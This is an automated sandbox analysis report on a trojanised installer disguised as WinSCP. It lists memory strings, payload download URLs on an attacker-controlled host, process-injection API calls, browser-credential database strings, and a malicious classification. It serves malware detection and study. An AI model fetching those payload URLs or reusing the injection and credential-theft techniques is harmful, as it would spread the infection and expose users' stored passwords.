Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/amshm.bin
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/sh.ext.exe.bin
Source: Set-up.exe, 00000000.00000002.1705937960.0000000004A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://h1.coldwalk.top/shark.bin
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Set-up.exe	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Set-up.exe	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Amcache.hve.7.dr	String found in binary or memory: http://upx.sf.net
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/proxy-auth
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/proxy-authProxy-AuthorizationProxy-AuthenticateProxy-Authentication-Inf
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-auth
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-authAuthorizationWWW-AuthenticateAuthentication-InfoCould
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/server-authhttp://webdav.org/neon/hooks/proxy-authhttp://webdav.org/neo
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-locking
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockingHas
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockingLocked
Source: Set-up.exe	String found in binary or memory: http://webdav.org/neon/hooks/webdav-lockinghttp://webdav.org/neon/hooks/webdav-lockinglock:
Source: Set-up.exe	String found in binary or memory: http://winscp.net/schema/session/1.0
Source: Set-up.exe	String found in binary or memory: http://www.borland.com/namespaces/Types
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-passport-req
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-passport-reqWWW-AuthenticatePassport1.4Passport1.4http://www.w
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-redirect
Source: Set-up.exe	String found in binary or memory: http://www.webdav.org/neon/hooks/http-redirecthttp://www.webdav.org/neon/hooks/http-redirectAborted
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: Set-up.exe, 00000000.00000003.1543437786.0000000010CB5000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1722877352.0000000010B2D000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1526697071.0000000010D45000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv209h
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Set-up.exe	String found in binary or memory: https://filezilla-project.org/bThis
Source: chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: Set-up.exe	String found in binary or memory: https://github.com/UweRaabe/PngComponents
Source: Set-up.exe	String found in binary or memory: https://github.com/bji/libs30https://github.com/bji/libs3/blob/master/LICENSE$Error
Source: Set-up.exe	String found in binary or memory: https://github.com/plashenkov/TBX
Source: Set-up.exe	String found in binary or memory: https://jcl.delphi-jedi.org/
Source: Set-up.exe	String found in binary or memory: https://jrsoftware.org/tb2kdl.php
Source: Set-up.exe	String found in binary or memory: https://libexpat.github.io/?https://www.chiark.greenend.org.uk/~sgtatham/putty/licence.html
Source: Set-up.exe	String found in binary or memory: https://notroj.github.io/neon/
Source: Set-up.exe	String found in binary or memory: https://openssl-library.org/)WebDAV/HTTP
Source: Set-up.exe	String found in binary or memory: https://winscp.net/#https://winscp.net/eng/docs/history
Source: Set-up.exe	String found in binary or memory: https://winscp.net/D
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/docs/?ver=%s&lang=%s-https://winscp.net/eng/docs/%s?ver=%s&lang=%s
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/donate.php
Source: Set-up.exe	String found in binary or memory: https://winscp.net/eng/translations.php:https://winscp.net/eng/docs/search.php?ver=%s&lang=%s&q=%sKh
Source: Set-up.exe	String found in binary or memory: https://winscp.net/forum/
Source: Set-up.exe	String found in binary or memory: https://winscp.net/updates.php#https://winscp.net/eng/download.php
Source: Set-up.exe	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Set-up.exe	String found in binary or memory: https://www.fsf.org/
Source: Set-up.exe	String found in binary or memory: https://www.gnu.org/licenses/
Source: Set-up.exe	String found in binary or memory: https://www.gnu.org/licenses/why-not-lgpl.html
Source: Set-up.exe, 00000000.00000003.1633962539.0000000010C78000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643211493.0000000010B08000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1643003393.0000000010BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000001A.00000002.1631578188.0000022EAF8FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026711E5 CreateThread,malloc,NtClose,free,	0_2_026711E5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0267066E NtProtectVirtualMemory,	0_2_0267066E
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02670B72 NtGetContextThread,NtSetContextThread,NtResumeThread,	0_2_02670B72
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02670CD8 NtAllocateVirtualMemory,	0_2_02670CD8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026710E8 NtClose,	0_2_026710E8
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026719C5 free,NtClose,free,	0_2_026719C5
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_0267114C NtClose,	0_2_0267114C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02671084 NtClose,	0_2_02671084
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_02688419 NtWriteVirtualMemory,	0_2_02688419
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026884E0 NtWow64QueryInformationProcess64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,	0_2_026884E0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026886C0 NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,NtWow64ReadVirtualMemory64,	0_2_026886C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D2039 NtAllocateVirtualMemory,	0_2_043D2039
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D208C NtFreeVirtualMemory,	0_2_043D208C
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D20CA NtProtectVirtualMemory,	0_2_043D20CA

Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_026886C0	0_2_026886C0
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D062F	0_2_043D062F
Source: C:\Users\user\Desktop\Set-up.exe	Code function: 0_2_043D003E	0_2_043D003E

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 144

Source: Set-up.exe, 00000000.00000000.1342881075.0000000000D46000.00000020.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename vs Set-up.exe
Source: Set-up.exe, 00000000.00000000.1347349204.0000000001E18000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewinscp.exe. vs Set-up.exe
Source: Set-up.exe	Binary or memory string: OriginalFilename vs Set-up.exe
Source: Set-up.exe	Binary or memory string: OriginalFilenamewinscp.exe. vs Set-up.exe

Source: Set-up.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@30/49@1/1

Source: C:\Users\user\Desktop\Set-up.exe

Code function: 0_2_043D0D3F CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_043D0D3F

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Code function: 1_2_0000000140001130 LoadLibraryA,CoInitializeEx,allocator,Concurrency::details::_CriticalNonReentrantLock::_Scoped_lock::~_Scoped_lock,CoCreateInstance,

1_2_0000000140001130

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1380
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5760
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4988
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2444
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4544
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3832

Source: C:\Windows\System32\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d3a74326-2ebc-43e9-ac64-3fe40897303f

Jump to behavior

Source: Set-up.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Set-up.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Set-up.exe, 00000000.00000003.1524189472.0000000010A15000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D62000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1495551156.0000000010A15000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004DB8000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D57000.00000004.00000800.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.1705937960.0000000004D4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000004.00000002.1485719615.000001438427A000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000B.00000003.1496803859.000001FB4001F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Set-up.exe	String found in binary or memory: id-cmc-addExtensions
Source: Set-up.exe	String found in binary or memory: set-addPolicy
Source: Set-up.exe	String found in binary or memory: kernel32LoadLibraryExA\/AddDllDirectory\<
Source: Set-up.exe	String found in binary or memory: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79, 2022/06/13-17:46:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.5 (Windows)" xmp:CreateDate="2022-06-27T15:58:50+01:00" xmp:ModifyDate="2022-09-01T10:59:47+01:00" xmp:MetadataDate="2022-09-01T10:59:47+01:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:1df1e3c7-03f5-1143-add8-c546d4d2a0a8" xmpMM:DocumentID="adobe:docid:photoshop:1fdce7f7-d0f3-8345-8210-9a399dc0c608" xmpMM:OriginalDocumentID="xmp.did:9d71b7e1-ed99-5f4c-b129-f6db64cc2a6c"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:9d71b7e1-ed99-5f4c-b129-f6db64cc2a6c" stEvt:when="2022-06-27T15:58:50+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:1df1e3c7-03f5-1143-add8-c546d4d2a0a8" stEvt:when="2022-09-01T10:59:47+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
Source: Set-up.exe	String found in binary or memory: " id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.2-c000 79.1b65a79, 2022/06/13-17:46:14 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 23.5 (Windows)" xmp:CreateDate="2022-06-27T15:59:46+01:00" xmp:ModifyDate="2022-09-01T11:07:26+01:00" xmp:MetadataDate="2022-09-01T11:07:26+01:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:51edf77f-337d-df4c-9412-c02490953f86" xmpMM:DocumentID="adobe:docid:photoshop:38f42b90-13ae-6648-ac1e-ffa02882af0e" xmpMM:OriginalDocumentID="xmp.did:c0055a1b-163f-6548-addc-8e97eea98b83"> <xmpMM:History> <rdf:Seq> <rdf:li stEvt:action="created" stEvt:instanceID="xmp.iid:c0055a1b-163f-6548-addc-8e97eea98b83" stEvt:when="2022-06-27T15:59:46+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)"/> <rdf:li stEvt:action="saved" stEvt:instanceID="xmp.iid:51edf77f-337d-df4c-9412-c02490953f86" stEvt:when="2022-09-01T11:07:26+01:00" stEvt:softwareAgent="Adobe Photoshop 23.5 (Windows)" stEvt:changed="/"/> </rdf:Seq> </xmpMM:History> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>

Source: unknown	Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 144
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5760 -s 204
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1380 -s 224
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1380 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2444 -s 152
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2444 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3832 -s 228
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3832 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4544 -s 144
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4544 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4988 -s 224
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4988 -s 92
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Section loaded: sxs.dll	Jump to behavior

Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 23057920 > 1048576

